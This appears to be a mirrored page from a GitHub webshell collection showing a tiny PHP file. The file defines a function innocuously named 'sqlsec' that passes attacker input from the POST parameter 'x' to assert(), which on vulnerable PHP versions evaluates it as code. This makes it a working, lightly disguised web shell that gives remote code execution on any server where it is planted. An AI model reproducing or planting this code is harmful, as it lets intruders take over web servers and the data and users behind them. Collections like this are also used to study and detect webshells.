mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
7 lines
86 B
PHP
7 lines
86 B
PHP
<?php
|
|
function sqlsec($a){
|
|
assert($a);
|
|
}
|
|
sqlsec($_POST['x']);
|
|
?>
|